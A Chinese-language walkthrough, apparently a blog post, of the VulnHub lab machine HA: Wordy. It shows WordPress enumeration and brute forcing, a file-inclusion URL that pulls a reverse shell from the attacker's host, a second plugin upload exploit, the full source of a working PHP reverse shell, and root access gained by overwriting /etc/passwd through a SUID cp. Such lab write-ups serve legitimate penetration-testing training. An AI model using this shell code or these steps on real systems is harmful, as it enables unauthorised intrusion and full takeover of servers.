• vulnhub靶机ha:wordy


    靶机下载链接:HA: Wordy ~ VulnHub

    靶机ip:192.168.174.136(后面重启后变成192.168.174.137)

    kali ip:192.168.174.128

    目录

    靶机ip发现:

    靶机端口扫描:

    子目录扫描:

    wpscan扫描

    漏洞利用1

    漏洞利用2

    getshell

    提权


    靶机ip发现:

    靶机端口扫描:

    子目录扫描:

    扫描完成后进行查看,发现需要进行登录,然后再使用wpscan进行用户名和插件的扫描

    wpscan扫描

    wpscan --url 'http://192.168.174.136/wordpress/' -e u,p

    用户名扫描到两个

    插件扫到很多

    很多都是过时了的

    找到两个用户,这里可以尝试进行爆破使用的top1000字典进行爆破的,发现没有结果,

    wpscan --url 'http://192.168.174.136/wordpress/' -e u -P PasswordDic-master/top1000.txt

    这里就不做过多的尝试了因为还有很多的插件可以利用

    漏洞利用1

    这里先看一下gallery的exp

    移动脚本到桌面,发现还需要账号密码

    再看一下另外一个插件的漏洞,查看一下mail-masta的漏洞

    都是1.0版本的,和我们的版本是一样的,这里是本地文件包含漏洞,进行查看

    将txt下载到本地进行查看

    发现payload

    将payload进行拼接http://192.168.174.136/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

    这样就可以可以通过包含远程shell执行解析并进行反弹shell

    可以使用msfvenom生成也可以使用本地自带的反弹shell脚本

    目录为/usr/share/webshells/php/php-reverse-shell.php

    这里的主要几个步骤是将脚本放在任意目录下,先对脚本修改,修改ip和端口即可

    这样我们的脚本就生成好了

    接下来python开启服务,再开启nc进行shell的接收

    用靶机的漏洞来访问kali的木马文件

    http://192.168.174.137/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.174.128/yxq.php

    这样就接收到了shell

    漏洞利用2

    这里再尝试一下其他插件,

    这里发现payload和如何反弹shell

    查看一下脚本

    发现payload

    这里把payload复制下来,进行ip和端口的修改,这后面有对应的年份和月份,这里根据我们在主页看到的几年几月,修改一下即可

    修改完如下

    这里将文件放在桌面,命名为shell.html,再使用python开启服务,访问本地127.0.0.1的shell.html,进行木马的上传,这里可以上传之前生成的木马即可

    上传成功,现在打开nc接收shell,然后访问payload给的shell path即可

    可以看到接收到shell

    第一次上传的是kali生成的php反弹shell脚本,反弹失败,最后百度了php-reverse-shell的脚本,才成功反弹shell

    只需要修改ip和端口即可

    1. set_time_limit (0);
    2. $ip = "192.168.1.111";
    3. $port = "13123";
    4. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    5. if (!$sock)
    6.        exit("$errstr ($errno)");
    7. if(function_exists('proc_open')){
    8. $descriptorspec = array(
    9.    0 => array("pipe", "r"), 
    10.    1 => array("pipe", "w"), 
    11.    2 => array("pipe", "w"
    12. );
    13. $process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
    14. if (!is_resource($process))
    15.        exit("ERROR: Can't reverse shell");
    16. stream_set_blocking($pipes[0], 0);
    17. stream_set_blocking($pipes[1], 0);
    18. stream_set_blocking($pipes[2], 0);
    19. stream_set_blocking($sock, 0);
    20.       
    21. print("Successfully opened reverse shell to $ip:$port");
    22. while (1) {
    23.        if (feof($sock)) {
    24.               print("ERROR: Shell connection terminated");
    25.               break;
    26.        }
    27.        if (feof($pipes[1])) {
    28.               print("ERROR: Shell process terminated");
    29.               break;
    30.        }
    31.       
    32.        $input = fread($sock, 1024);
    33.        fwrite($pipes[0], $input);
    34.       
    35.        $output = fread($pipes[1], 1024);
    36.        fwrite($sock, $output);
    37.       
    38.        $output = fread($pipes[2], 1024);
    39.        fwrite($sock, $output);
    40. }     
    41. fclose($sock);
    42. fclose($pipes[0]);
    43. fclose($pipes[1]);
    44. fclose($pipes[2]);
    45. proc_close($process);
    46. }
    47. else print "function 'proc_open' is not exists.";
    48. ?>

    getshell

    使用SHELL=bash script -q /dev/null开启交互式窗口也可以使用python -c ‘import pty;pty.spawn(“/bin/bash”)’

    切换目录查找有用信息

    这里发现有一个secret.zip文件

    给他下载到我们的本地

    直接访问靶机ip+secret.zip即可下载

    下载后解压需要密码,使用fcrackzip进行破解,但是没有出结果

    提权

    进行suid权限命令的查找

    在下面找到一个复制命令cp

    查看cp的权限

    可以发现是root权限

    这里可以选择对/etc/passwd的文件进行修改,先把passwd文件通过python添加到本地,然后进行修改

    使用openssl生成密码,对root的密码x进行替换,这个x说明密码存在/etc/shadow当中,但是如果/etc/passwd下存在密码的话,会优先匹配passwd下的密码,我这里是修改了root的密码,然后又添加了ycx用户

    修改完成后在kali开启python服务进行passwd的传输

    因为在靶机是shell中开启python无法断掉,只能ctrl+c重新获取shell

    切换到tmp目录下进行下载

    再使用cp命令进行passwd的替换

    使用su切换用户

    可以看到已经切换到了root用户下

    拿到flag

  • 相关阅读:
    2.3 数据库-深入理解
    幽默直观的文档作者注释
    计算机网络之传输层------TCP协议详解
    新增测试场景:方言
    开发指导—利用CSS动画实现HarmonyOS动效(一)
    C# 文件 校验:MD5、SHA1、SHA256、SHA384、SHA512、CRC32、CRC64
    医疗项目 01(项目简介)
    springboot移除nacos yml无法加载
    redis安装及集群搭建
    Maven仓库Nexus安装部署
  • 原文地址:https://blog.csdn.net/weixin_52450702/article/details/128058529